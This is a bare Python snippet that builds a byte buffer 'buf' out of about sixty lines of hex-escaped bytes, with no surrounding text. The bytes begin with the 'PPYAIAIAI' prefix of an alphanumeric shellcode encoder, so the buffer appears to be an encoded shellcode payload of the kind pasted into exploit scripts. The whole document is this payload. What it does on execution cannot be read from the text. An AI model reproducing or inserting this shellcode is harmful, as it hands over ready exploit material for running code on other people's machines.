buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x4b\x4c\x37\x78\x53\x52"
buf += b"\x39\x70\x39\x70\x4d\x30\x31\x50\x35\x39\x4b\x35\x4c"
buf += b"\x71\x57\x50\x62\x44\x52\x6b\x30\x50\x30\x30\x52\x6b"
buf += b"\x42\x32\x4a\x6c\x34\x4b\x71\x42\x4b\x64\x74\x4b\x32"
buf += b"\x52\x4f\x38\x4c\x4f\x34\x77\x6f\x5a\x6b\x76\x4c\x71"
buf += b"\x69\x6f\x54\x6c\x4d\x6c\x51\x51\x53\x4c\x7a\x62\x4c"
buf += b"\x6c\x4d\x50\x56\x61\x58\x4f\x4a\x6d\x5a\x61\x37\x57"
buf += b"\x47\x72\x6c\x32\x4e\x72\x30\x57\x54\x4b\x30\x52\x6c"
buf += b"\x50\x74\x4b\x6d\x7a\x4d\x6c\x42\x6b\x50\x4c\x6e\x31"
buf += b"\x71\x68\x68\x63\x50\x48\x49\x71\x58\x51\x62\x31\x54"
buf += b"\x4b\x50\x59\x4d\x50\x79\x71\x58\x53\x64\x4b\x30\x49"
buf += b"\x4e\x38\x69\x53\x4e\x5a\x71\x39\x72\x6b\x4e\x54\x74"
buf += b"\x4b\x6a\x61\x68\x56\x30\x31\x6b\x4f\x64\x6c\x69\x31"
buf += b"\x38\x4f\x5a\x6d\x49\x71\x76\x67\x50\x38\x79\x50\x30"
buf += b"\x75\x78\x76\x4d\x33\x33\x4d\x78\x78\x6f\x4b\x73\x4d"
buf += b"\x4f\x34\x62\x55\x67\x74\x6e\x78\x64\x4b\x6e\x78\x6f"
buf += b"\x34\x79\x71\x56\x73\x6f\x76\x34\x4b\x6a\x6c\x6e\x6b"
buf += b"\x64\x4b\x42\x38\x4b\x6c\x49\x71\x67\x63\x54\x4b\x39"
buf += b"\x74\x64\x4b\x49\x71\x46\x70\x65\x39\x30\x44\x6d\x54"
buf += b"\x6f\x34\x61\x4b\x61\x4b\x51\x51\x52\x39\x51\x4a\x52"
buf += b"\x31\x49\x6f\x57\x70\x31\x4f\x61\x4f\x50\x5a\x72\x6b"
buf += b"\x4c\x52\x78\x6b\x64\x4d\x51\x4d\x61\x58\x6d\x63\x70"
buf += b"\x32\x79\x70\x59\x70\x63\x38\x52\x57\x62\x53\x6f\x42"
buf += b"\x71\x4f\x6e\x74\x71\x58\x30\x4c\x73\x47\x4b\x76\x6a"
buf += b"\x67\x79\x6f\x6a\x35\x64\x78\x62\x70\x69\x71\x49\x70"
buf += b"\x39\x70\x6e\x49\x36\x64\x6e\x74\x42\x30\x43\x38\x6f"
buf += b"\x39\x33\x50\x70\x6b\x49\x70\x4b\x4f\x78\x55\x4e\x70"
buf += b"\x32\x30\x6e\x70\x50\x50\x31\x30\x6e\x70\x6d\x70\x32"
buf += b"\x30\x71\x58\x4a\x4a\x7a\x6f\x79\x4f\x59\x50\x49\x6f"
buf += b"\x77\x65\x52\x77\x70\x6a\x6b\x55\x70\x68\x69\x7a\x4a"
buf += b"\x6a\x6c\x4e\x6b\x75\x53\x38\x69\x72\x6d\x30\x6b\x6f"
buf += b"\x43\x61\x52\x69\x69\x56\x50\x6a\x7a\x70\x51\x46\x30"
buf += b"\x57\x32\x48\x64\x59\x74\x65\x33\x44\x70\x61\x59\x6f"
buf += b"\x46\x75\x52\x65\x79\x30\x34\x34\x5a\x6c\x79\x6f\x70"
buf += b"\x4e\x39\x78\x63\x45\x78\x6c\x52\x48\x6c\x30\x35\x65"
buf += b"\x34\x62\x62\x36\x39\x6f\x46\x75\x53\x38\x53\x33\x62"
buf += b"\x4d\x50\x64\x4d\x30\x35\x39\x5a\x43\x62\x37\x70\x57"
buf += b"\x52\x37\x4c\x71\x4a\x56\x31\x5a\x4c\x52\x50\x59\x70"
buf += b"\x56\x67\x72\x69\x6d\x51\x56\x36\x67\x4f\x54\x4d\x54"
buf += b"\x6f\x4c\x49\x71\x5a\x61\x72\x6d\x6d\x74\x4b\x74\x4e"
buf += b"\x30\x35\x76\x69\x70\x70\x44\x4f\x64\x70\x50\x70\x56"
buf += b"\x50\x56\x51\x46\x6d\x76\x31\x46\x70\x4e\x4e\x76\x32"
buf += b"\x36\x31\x43\x4e\x76\x33\x38\x74\x39\x66\x6c\x6f\x4f"
buf += b"\x33\x56\x49\x6f\x77\x65\x34\x49\x77\x70\x4e\x6e\x70"
buf += b"\x56\x4d\x76\x4b\x4f\x4e\x50\x61\x58\x6a\x68\x34\x47"
buf += b"\x4d\x4d\x73\x30\x4b\x4f\x39\x45\x45\x6b\x48\x70\x77"
buf += b"\x45\x64\x62\x6e\x76\x61\x58\x76\x46\x53\x65\x35\x6d"
buf += b"\x63\x6d\x39\x6f\x39\x45\x6f\x4c\x59\x76\x71\x6c\x39"
buf += b"\x7a\x31\x70\x49\x6b\x77\x70\x52\x55\x4a\x65\x37\x4b"
buf += b"\x71\x37\x6b\x63\x34\x32\x70\x6f\x6f\x7a\x69\x70\x42"
buf += b"\x33\x49\x6f\x79\x45\x41\x41"
